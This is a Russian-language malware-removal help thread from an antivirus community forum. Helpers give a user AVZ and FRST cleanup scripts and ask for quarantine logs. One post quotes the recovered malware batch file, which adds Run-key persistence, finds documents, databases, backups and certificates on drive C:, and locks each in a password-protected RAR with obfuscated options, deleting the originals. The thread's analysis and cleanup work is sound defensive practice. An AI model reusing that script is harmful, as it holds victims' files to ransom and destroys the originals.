Перейти к содержанию

Заражение ПК


Рекомендуемые сообщения

Внимание! Рекомендации написаны специально для этого пользователя. Если рекомендации написаны не для вас, не используйте их - это может повредить вашей системе.

 

Если у вас похожая проблема - создайте тему в разделе Уничтожение вирусов и выполните Правила оформления запроса о помощи.

 

Здравствуйте! 

 


 

Важно! на Windows Vista/7/8 AVZ запускайте через контекстное меню проводника от имени Администратора. Выполните скрипт в АВЗ (Файл - Выполнить скрипт):

 



begin
RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced','HideFileExt', 0);
RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1804', 1);
RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '2201', 3);
RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1004', 3);
RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1001', 1);
RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1201', 3);
 QuarantineFile('C:\Windows\Fonts\fms_metadata.exe','');
 QuarantineFile('C:\Windows\Fonts\StaticCache.exe','');
 QuarantineFile('C:\Users\Svetlana\appdata\roaming\scrss.exe','');
 TerminateProcessByName('c:\users\svetlana\appdata\roaming\tor project\tor.exe');
 TerminateProcessByName('c:\users\svetlana\appdata\roaming\gemware\node-webkit.exe');
 QuarantineFile('c:\users\svetlana\appdata\roaming\gemware\node-webkit.exe','');
 DeleteFile('c:\users\svetlana\appdata\roaming\gemware\node-webkit.exe','32');
 RegKeyParamDel('HKEY_CURRENT_USER','Software\Microsoft\Windows\CurrentVersion\Run','node-webkit');
 DeleteFile('C:\Windows\Fonts\fms_metadata.exe','32');
 DeleteFile('C:\Windows\Fonts\StaticCache.exe','32');
 DeleteFile('C:\Users\Svetlana\appdata\roaming\scrss.exe','32');
ExecuteSysClean;
RebootWindows(true);
end.


 

Внимание! Будет выполнена перезагрузка компьютера. После перезагрузки компьютера выполните скрипт в АВЗ:

 



begin
CreateQurantineArchive(GetAVZDirectory+'quarantine.zip'); 
end.


 

quarantine.zip из папки AVZ отправьте по адресу mike1@avp.su.

1. В заголовке письма напишите "Карантин".

2. В письме напишите ссылку на Вашу тему.

3. Прикрепите файл карантина и нажмите "Отправить"

 

Сделайте новые логи Автологгером. 

 

Ссылка на комментарий
Поделиться на другие сайты

Скачайте Farbar Recovery Scan Tool  NAAC5Ba.png и сохраните на Рабочем столе.

 

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.

  1. Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением.

Убедитесь, что под окном Optional Scan отмечены "List BCD", "Driver MD5" и "90 Days Files".

Нажмите кнопку Scan.

После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа. Пожалуйста, прикрепите отчет в следующем сообщении.

Если программа была запущена в первый раз, будет создан отчет (Addition.txt). Пожалуйста, прикрепите его в следующем сообщении.


3munStB.png
Ссылка на комментарий
Поделиться на другие сайты

Интересный семпл. Winrar юзает. :)

 

SYSTEМ (S-1-5-21-407854602-3899431854-3273328985-1011 - Administrator - Enabled)

Что за учетка? К тебе похоже удаленно зашли. 

 

 
 
ВНИМАНИЕ! Данный скрипт написан специально для этого пользователя, использование его на другом компьютере может привести к неработоспособности Windows!
 
  • Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:
CreateRestorePoint:
CloseProcesses:
HKU\S-1-5-21-407854602-3899431854-3273328985-500\...\Run: [TorProject] => C:\Users\Svetlana\AppData\Roaming\Tor Project\tor.exe [2233344 2015-09-14] ()
GroupPolicyScripts: Restriction <======= ATTENTION
GroupPolicyScripts\User: Restriction <======= ATTENTION
  • Запустите FRST и нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!
  • Обратите внимание, что компьютер будет перезагружен.
  • Внимание! Если на рабочем столе будет создан архив upload.zip, то загрузите этот архив через данную форму
 
 
Ссылка на комментарий
Поделиться на другие сайты

 

Интересный семпл. Winrar юзает. :)

 

SYSTEМ (S-1-5-21-407854602-3899431854-3273328985-1011 - Administrator - Enabled)

Что за учетка? К тебе похоже удаленно зашли. 

 

М-да, слона-то я и не приметил....

Fixlog.txt

Ссылка на комментарий
Поделиться на другие сайты

@echo off
if not exist "%programfiles%\WinRAR\RAR.exe" (start "" %Temp%\dwr.exe)
TIMEOUT /T 120 /NOBREAK
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v scrss /t REG_SZ /d "%AppData%"\scrss.exe /f
REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v scrss /t REG_SZ /d "%AppData%"\scrss.exe /f
>nul chcp 1251
setlocal enabledelayedexpansion
set fPath=C:
set rar="%programfiles%\WinRAR\RAR.exe"
for /f "delims=" %%i in ('dir /b /s /a-d "%fPath%\*.7z" "%fPath%\*.hbi" "%fPath%\*.doc" "%fPath%\*.ord" "%fPath%\*.efd" "%fPath%\*.cab" "%fPath%\*.cf" "%fPath%\*.csv" "%fPath%\*.erf" "%fPath%\*.ldf" "%fPath%\*.ert" "%fPath%\*.dd" "%fPath%\*.nd" "%fPath%\*.lst" "%fPath%\*.pf" "%fPath%\*.prm" "%fPath%\*.xml" "%fPath%\*.lck" "%fPath%\*.mxl" "%fPath%\*.vbox" "%fPath%\*.vdi" "%fPath%\*.vmdk" "%fPath%\*.dt" "%fPath%\*.cf" "%fPath%\*.epf" "%fPath%\*.dat" "%fPath%\*.cdx" "%fPath%\*.st" "%fPath%\*.tip" "%fPath%\*.fdb" "%fPath%\*.raw" "%fPath%\*.idx" "%fPath%\*.1cl" "%fPath%\*.db" "%fPath%\*.xtbl" "%fPath%\*.rcd" "%fPath%\*.bak" "%fPath%\*.sql" "%fPath%\*.tib" "%fPath%\*.scx" "%fPath%\*.ods" "%fPath%\*.nup" "%fPath%\*.tif" "%fPath%\*.bkf" "%fPath%\*.zip" "%fPath%\*.rar" "%fPath%\*.docx" "%fPath%\*.xls" "%fPath%\*.xlsx" "%fPath%\*.pdf" "%fPath%\*.djvu" "%fPath%\*.mdb" "%fPath%\*.cer" "%fPath%\*.p12" "%fPath%\*.1cd" "%fPath%\*.md" "%fPath%\*.kwm" "%fPath%\*.pwm" "%fPath%\*.pfx" "%fPath%\*.mdf" "%fPath%\*.dbf" "%fPath%\*.odt" "%fPath%\*.vob" "%fPath%\*.ifo" "%fPath%\*.umpts" "%fPath%\*.clme1" "%fPath%\*.srx" "%fPath%\*.mir" "%fPath%\*.df7" "%fPath%\*.fpt" "%fPath%\*.jrxml" "%fPath%\*.jpg" "%fPath%\*.jpeg" "%fPath%\*.mp4" "%fPath%\*.mp3" "%fPath%\*.php" "%fPath%\*.html" "%fPath%\*.mira" "%fPath%\*.fbk" "%fPath%\*.gbk" "%fPath%\*.ndf"') do (
  for /f "delims=" %%j in ("%%i") do (
    %rar% a%tgxtnfnzcgm% %rlaxsse%-%wenpgbayurpah%s%yemotmkpoytqr%f%whmxdb%x%nfh% %gthchenzzc%-%yaevblaiyzyd%d%znoswkuuugo%h%mswqalbodk% %hwg%-%tkvriqspctf%i%pojqxieg%b%duqnpuwqi%c%hdsr%k%brsgejtbc% %vlvqvbdfwbioke%-%dzqejtgqh%i%cnjm%n%edxxpfbnqmhgm%u%spiqyeznt%l%epeoygotrqvvcq% %qsrjduaepfpbc%-%btnidvokn%y%yddd% %axzhujwh%-%pzyltuckrohp%m%bdyxojghd%0%adddlwcxfrztm% %dwm%-%wenpg%d%bazprjohrmdz%f%ssmdtrodhsuy% %lcif%-%fqiuk%p%bxvbwwzrdhhfk%"%jwfjfab%m%nigvsknambunep%F%chgquvbem%M%tkvriqs%N%xiqcozzfcd%H%kmuuv%J%ribov%f%kptcrmbivyier%n%iqdoack%6%fzlyyrupzs%5%agcliwu%r%cnjmmiiunts%g%xrxmbaulqxfyc%U%wkq%D%srhyvermg%D%fzpdwfqgbmnt%y%xrcrznqcss%t%mwadvy%u%kpyipa%h%ekfyegetsvz%k%uhrdndezo%d%msskcxe%f%gnegprhjzna%5%dwmqogrztani%r%fjwnjf%4%hgsz%3%cpjujiatzdqyn%b%nfhnvkvbzrw%f%uugggpu%d%hfnte%"%njlaqxjrnvshyc% %jdnlube%-%tnzeddg%e%ksxqma%p%ajgz%1%tfw% "%%~dpj\%%~nj.rar" "%%i"
  )
)

С виду вроде все не так плохо, но как генерируются пароль для SFX архивов я пока не понял. 

 

Можете пока создать запрос  http://forum.kasperskyclub.ru/index.php?showtopic=48525

 

В запросе прикрепите:

 

1. Архив quarantine.zip

2. Небольшой зашифрованный файл в архиве. 

Ссылка на комментарий
Поделиться на другие сайты

Пожалуйста, войдите, чтобы комментировать

Вы сможете оставить комментарий после входа в



Войти
  • Похожий контент

    • Asya
      От Asya
      Здравствуйте, уважаемые консультанты. Появилась необходимость обратиться к вам за советом. Очень надеюсь на вашу помощь. 
      Ситуация следующая:
      На смартфон в телеге было скачано два файла epub (электронные книги) из чата по англо-китайским книжкам. После, через соцсети файлы переброшены на ноутбук. 
      27.09 - скачана первая книга. Проверка Kaspersky Security Cloud дала добро, и файл был открыт. 
      20.10 - скачана вторая книга. Проверка Касперского - окей, но ещё закидываю файл на Virustotal - и вот тут обнаруживается единственное (1/64) срабатывание у китайского Kingsoft - пишет что в файле HTA trojan. Сразу удаляю файл и перепроверяю первую книгу - результат такой же, Kingsoft ругается, остальные антивирусы молчат.
      Другие файлы, из того же чата, скачанные ранее - все целиком чистые, реакт есть только на те два файла.     
      Я бы подумала на ложное срабатывание, но вдруг вспомнила, что:
      15.10 - на мой номер телефона пришло смс с кодом верификации от китайского Wechat (которым не пользуюсь уже 10 лет) и который, естественно, не запрашивала. 
      Плюсом последние несколько дней на одну из почт (моего основного гугл-аккаунта) сыпется нервирующий иностранный спам (раньше такого не было). 

      Ноутбук проверяла своим Kaspersky Security Cloud, KVRT, Dr.Web Cureit - в них всё чисто, ничего не обнаруживается. 
       
      И теперь сомневаюсь, то ли это просто совпадение, то ли мне попался какой-то хитрый китайский вирус, который ещё никто из антивирусов не видит. И где его теперь искать: на компьютере или на смартфоне (и вот с последним я вообще не знаю, что делать)? Не очень хочется думать, что какие-то китайцы таскают мои данные. 
      Буду очень благодарна, если сможете помочь и подсказать, есть ли следы вирусной активности. Заранее спасибо за уделённое время. 
      CollectionLog-2024.11.02-23.04.zip
    • yare4kaa
      От yare4kaa
      Здравствуйте, был в рейсе и не чистил пк от вирусов, заразился много фигней, нужна помощь специалистов.
      Логи ниже CollectionLog-2024.11.25-18.32.zip
    • Dwight
      От Dwight
      Думаю заразил Пк вирусами, так-как при банальном открытии браузера вентиляторы начинают активно набирать обороты, а работать в программах для монтажа стало просто невозможно, но все проблемы меня покидают после открытия диспетчера задач
       
      CollectionLog-2024.10.24-13.20.zip
    • Alexandr_XML
      От Alexandr_XML
      Добрый день. Сегодня с утра запустил полную проверку системы и обнаружил Trojan.Win32.SEPEH.gen и никак не могу удалить. После попытки удаления выбрасывает в BSOD и система перезагружается. Судя по отчёту Касперского, этот вирус заразил более 84 программ.
      CollectionLog-2024.11.12-07.12.zip
    • Александр Лаптев
      От Александр Лаптев
      Добрый день ноутбук заразился трояном
      После попытки полечить с помощью kaspersky и последующей перезагрузкой троян появился снова

      Читал темы на форуме, сразу приложу отчетыAddition.txtFRST.txt
      сделанные с помощью программы Farbar Recovery Scan Tool
×
×
  • Создать...